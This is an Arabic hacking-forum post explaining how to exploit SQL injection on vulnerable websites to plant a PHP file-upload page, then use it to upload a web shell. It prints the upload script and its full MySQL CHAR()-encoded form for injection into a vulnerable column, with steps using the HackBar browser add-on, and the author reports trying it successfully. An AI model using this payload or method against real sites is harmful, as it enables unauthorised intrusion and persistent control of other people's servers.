:: vBspiders Professional Network :: - استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)

استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

السلام عليكم ورحمة الله وبركاته ...
قبل فترة اكثر من شهر خطرت ببالي فكرة ...

هي شلون نعمل مركز رفع من الخلال المواقع المصابة بـ SQL

الطريقة كالتالي ...

ناخذ سكربت مركز الرفع وهذا الكود بتاعه ...

كود PHP:

  
 <?php  
echo '<b>Upload Center</b>'; 
echo '<b><br><br>'.php_u****().'<br></b>'; 
echo '<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">'; 
echo '<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>'; 
if( $_POST***91;'_upl'***93; == "Upload" ){ if(@copy($_FILES***91;'file'***93;***91;'tmp_****'***93;, $_FILES***91;'file'***93;***91;'****'***93;)) { echo '<b>Done !!!</b><br><br>'; } 
 else { echo '<b>!!!!!!!Upload Failed!!!!!! </b><br><br>'; }}?>

لازم تكون هاذي اداة Hack Bar منصب على الفيرفوكس بتاعك

من هنا تضيف اداة

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

ونروح على ادادة Hack Bar الموجودة بالفايرفوكس ونختار

SQL > MySQL > MySQLCHAR

راح يظهر مستطيل صغير تخليه بيه اكواد مركز الرفع الي فوق وتضغك ok راح تحصل هذه التشفيرة

CHAR(60, 63, 112, 104, 112, 32, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 85, 112, 108, 111, 97, 100, 32, 67, 101, 110, 116, 101, 114, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 46, 112, 104, 112, 95, 117, 42, 42, 42, 42, 40, 41, 46, 39, 60, 98, 114, 62, 60, 47, 98, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 102, 111, 114, 109, 32, 97, 99, 116, 105, 111, 110, 61, 34, 34, 32, 109, 101, 116, 104, 111, 100, 61, 34, 112, 111, 115, 116, 34, 32, 101, 110, 99, 116, 121, 112, 101, 61, 34, 109, 117, 108, 116, 105, 112, 97, 114, 116, 47, 102, 111, 114, 109, 45, 100, 97, 116, 97, 34, 32, 42, 42, 42, 42, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 32, 105, 100, 61, 34, 117, 112, 108, 111, 97, 100, 101, 114, 34, 62, 39, 59, 32, 101, 99, 104, 111, 32, 39, 60, 105, 110, 112, 117, 116, 32, 116, 121, 112, 101, 61, 34, 102, 105, 108, 101, 34, 32, 42, 42, 42, 42, 61, 34, 102, 105, 108, 101, 34, 32, 115, 105, 122, 101, 61, 34, 53, 48, 34, 62, 60, 105, 110, 112, 117, 116, 32, 42, 42, 42, 42, 61, 34, 95, 117, 112, 108, 34, 32, 116, 121, 112, 101, 61, 34, 115, 117, 98, 109, 105, 116, 34, 32, 105, 100, 61, 34, 95, 117, 112, 108, 34, 32, 118, 97, 108, 117, 101, 61, 34, 85, 112, 108, 111, 97, 100, 34, 62, 60, 47, 102, 111, 114, 109, 62, 39, 59, 32, 105, 102, 40, 32, 36, 95, 80, 79, 83, 84, 91, 39, 95, 117, 112, 108, 39, 93, 32, 61, 61, 32, 34, 85, 112, 108, 111, 97, 100, 34, 32, 41, 123, 32, 105, 102, 40, 64, 99, 111, 112, 121, 40, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 116, 109, 112, 95, 42, 42, 42, 42, 39, 93, 44, 32, 36, 95, 70, 73, 76, 69, 83, 91, 39, 102, 105, 108, 101, 39, 93, 91, 39, 42, 42, 42, 42, 39, 93, 41, 41, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 68, 111, 110, 101, 32, 33, 33, 33, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 32, 32, 101, 108, 115, 101, 32, 123, 32, 101, 99, 104, 111, 32, 39, 60, 98, 62, 33, 33, 33, 33, 33, 33, 33, 85, 112, 108, 111, 97, 100, 32, 70, 97, 105, 108, 101, 100, 33, 33, 33, 33, 33, 33, 32, 60, 47, 98, 62, 60, 98, 114, 62, 60, 98, 114, 62, 39, 59, 32, 125, 125, 63, 62)

-----------------------------

بعدها تاخذها على طول للعمود المصاب وتخليه مكانه وتضغط انتر وان شاء الله تشوف مركز الرفع امامك

ومن خلال المركز تكدر ترفع ملفاتك حتى الشل وتم التجربة وحمد لله انرفع لكن المشكلة بتحديد مساره

طيب يجي واحد يسأل كيف عرفت انرفع ..؟ لو ما انرفع كان السكربت طبع لك upload faild ....

واعتقد حل مشكلة المسار هي تنصيب سكربت مصاب على السيرفر الشخصي وتطبيق الفكرة ونشوف الشل وين ..

تحياتي اخوT-VIROS Dzـــــكم